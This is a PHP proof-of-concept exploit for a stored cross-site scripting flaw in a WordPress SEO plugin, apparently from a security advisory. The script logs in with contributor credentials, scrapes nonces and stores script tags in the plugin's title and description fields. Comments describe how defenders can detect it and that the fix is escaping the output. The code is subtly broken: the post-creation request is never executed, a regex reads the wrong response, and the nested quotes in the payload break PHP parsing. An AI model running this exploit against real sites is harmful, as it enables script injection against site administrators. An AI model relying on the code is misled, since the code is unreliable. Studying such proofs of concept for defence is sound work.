This flaw allowed authenticated users with contributor-level access or above to inject malicious scripts that would execute when a victim visited the wp-admin panel’s ‘All Posts’ page.
<?php
// Proof of concept for the stored XSS described in the advisory text above: a
// contributor-level account submits the normal post editor form with script
// content in the plugin's aiosp_title / aiosp_description fields; per the
// advisory, that content is rendered unescaped on the wp-admin "All Posts" page.
//
// Defender's view: the observable footprint is a single authenticated session
// issuing, in order, POST /wp-login.php, GET /wp-admin/post-new.php,
// POST /wp-json/wp/v2/posts, GET /wp-admin/post.php?action=edit and
// POST /wp-admin/post.php (action=editpost) whose aiosp_* fields contain
// "<script". The root-cause fix is output escaping in the plugin, i.e. updating
// to a version that escapes these fields; request logging for the sequence
// above from low-privilege roles is the detection hook.
//USAGE 'php poc.php https://mysite.com contributor password'
// Settings — all three values are taken verbatim from argv; nothing is validated.
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
//Json Encode Our New Post
// The post body itself is benign block-editor markup; the XSS payload is not
// in the post content but in the plugin's SEO fields submitted later.
$data = array( "Title" => "Exploit Post", "content" => "<!-- wp:paragraph -->\n<p>Test2</p>\n<!-- /wp:paragraph -->", "status"=>"pending");
$postdata = json_encode($data);
//Get Json post data length
// Used for the explicit Content-Length header on the REST request below.
$length = strlen($postdata);
// 1) Log in as contributor+
// Cookie jar is a temp file; the session cookies are reused by every later request.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]);
$output = curl_exec($ch);
curl_close($ch);
// Pull the Rest API Nonce
// The nonce is scraped from the inline script on the new-post editor page.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
//Rest API Nonce
// No check that the pattern matched; $matches[1] is read unconditionally.
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];
//Create New Post
// REST call authenticated by the session cookie plus the X-WP-Nonce header.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json', "X-WP-Nonce: $restnonce", "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
//Grab the page-id
// NOTE(review): this regex is run against the $content captured from the
// post-new.php fetch above, not against a response from the REST handle.
preg_match('/"id":([^"]+),/', $content, $matches);
$pageid = $matches[1];
//Grab Some More Nonces
// The classic edit screen carries both the plugin's own nonce field and the
// core editpost nonce; both are scraped from the HTML.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post.php?post=' . $pageid . '&action=edit');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
//AIOSEO NONCE
preg_match('/nonce\-aioseop\-edit\'\stype\=\'hidden\'\s\svalue\=\'([^"]+)\'\s/', $content, $matches);
$seononce = $matches[1];
//GENERAL WPNONCE
preg_match('/\{\"id":.+\,\"nonce\":"([^"]+)"/', $content, $matches);
$wpnonce = $matches[1];
//EDIT THE POST WITH XSS!
// This is the request that stores the payload: a standard editpost form
// submission in which the plugin's aiosp_title and aiosp_description fields
// carry script tags. Detection should key on these field names, not on the
// post content.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [ '_wpnonce' => $wpnonce, 'action' => 'editpost', 'post_ID' => $pageid, 'aiosp_edit' => '', 'nonce-aioseop-edit' => $seononce, 'aiosp_title' => '<script>alert('hello!')</script>', 'aiosp_description' => '</script><script>alert('hello!')</script>' ]);
$output = curl_exec($ch);
curl_close($ch);
// Dumps the raw HTML of the edit response; there is no success/failure check.
print_r($output);
?>
Chloe Chamberland
Chloe Chamberland
No
2020-07-16 (about 2 years ago)
2020-07-16 (about 2 years ago)
2021-01-02 (about 2 years ago)